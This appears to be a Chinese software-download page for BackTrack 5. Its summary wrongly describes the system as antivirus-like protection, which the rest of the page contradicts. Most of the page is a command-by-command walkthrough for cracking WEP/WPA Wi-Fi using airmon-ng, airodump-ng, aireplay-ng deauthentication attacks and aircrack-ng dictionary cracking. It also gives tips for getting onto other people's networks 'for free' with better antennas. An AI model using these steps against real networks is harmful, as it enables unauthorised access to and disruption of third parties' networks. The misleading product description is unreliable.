- 软件介绍
智能摘要
《Backtrack5》是一款专门为Linux系统打造的安全检测软件,具备强大防护能力,其病毒库实时更新,还能抵御远程黑客破解,可有效保障Linux系统安全。
软件说明
backTrack是一套专业用于计算机安全检测的Linux操作系统,简称bT。目前,最好用的版本是bT5 R3。
它能轻松破解采用WEP、WPA/WPA2加密方式的无线网络,不过这需要有强大的密码字典文件作为支撑。
该系统还集成了弱点扫描工具Nessus、渗透平台MSF、Sniff工具Wireshark 、ettercap以及VOIP检测工具等。
在bT5中单独列出的众多RFID工具,充分彰显了bT对基于无线射频技术的硬件系统的检测能力。
系统集成了Apache和MySQL,便于使用者搭建LAMP环境进行测试,同时也配备了Injection、XSS等工具。
软件使用
1、开启虚拟机中的BT5系统,打开BT5的终端,运用命令检测无线网卡是否存在,在终端输入:iwconfig,若BT5支持,通常显示为wlan0。
2、在BT5里,打开internet—》wicd network manager,扫描现存的无线网络;挑选信号较好的无线网,点击properties,即可查看该AP的基本信息。
3、打开终端,输入命令:airmon-ng start wlan0 6,这表示在第六个频道开启无线网卡wlan0的监听模式;对选定的AP进行监控,输入:airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0,这里的MAC就是上一步骤图中圈定的部分。
4、依据上一步骤的图,能找到多个Client客户端的MAC地址,任选一个,打开新的终端,上一个终端不要关闭,后续还会用到。在新终端输入:aireplay-ng -0 11 -a AP’s MAC -c CP’s MAC mon0,其中,-0表示采用deauth攻击模式,后面跟上攻击次数;-a后面跟AP的mac地址;-c后面跟客户端的mac地址;执行一次后查看第一个终端是否出现标志WAP Handshake 。若出现,离成功就不远了;若未出现,就重复该命令,直至出现握手。
5、对BT5握手抓到的包进行破解:
在终端输入:aircrack-ng -w password.txt -b AP’s MAC nenew.cap,其中password.txt是需要预置的字典文件,网上有很多,搜索即可获取。nenew.cap是抓到的包文件,保存后可能是nenew-01.cap。
软件特点
1、WEP加密方式分为开放式和共享式:
开放式加密方式通常可顺利注入并免费成功。
共享式加密方式必须有客户端才能免费,也可在XP下用其他无线网卡连接要破解的AP(多连几次),有时会有意外收获!
2、WPA的免费属于暴力免费,且必须有客户端,需抓取路由器与客户端之间的握手包。BT5集成了1940年到2012年所有8位数的生日密码,加入0 - 9、英文26个字母重复形式的8 - 10位数密码,还加入了部分常用密码。
3、若想免费顺利,最好用USB线将卡放到窗户边,再外接高增益天线以增强信号。
4、ChinaNet、CTC开头的信号以及AR7WRD和HG520s都是电信赠送的无路由功能的无线猫,由电脑拨号,AP仅打开与电信的桥接功能,未在AP内设拨号和路由功能,所以只能连接到AP,若无宽带帐号则无法上网!
软件截图
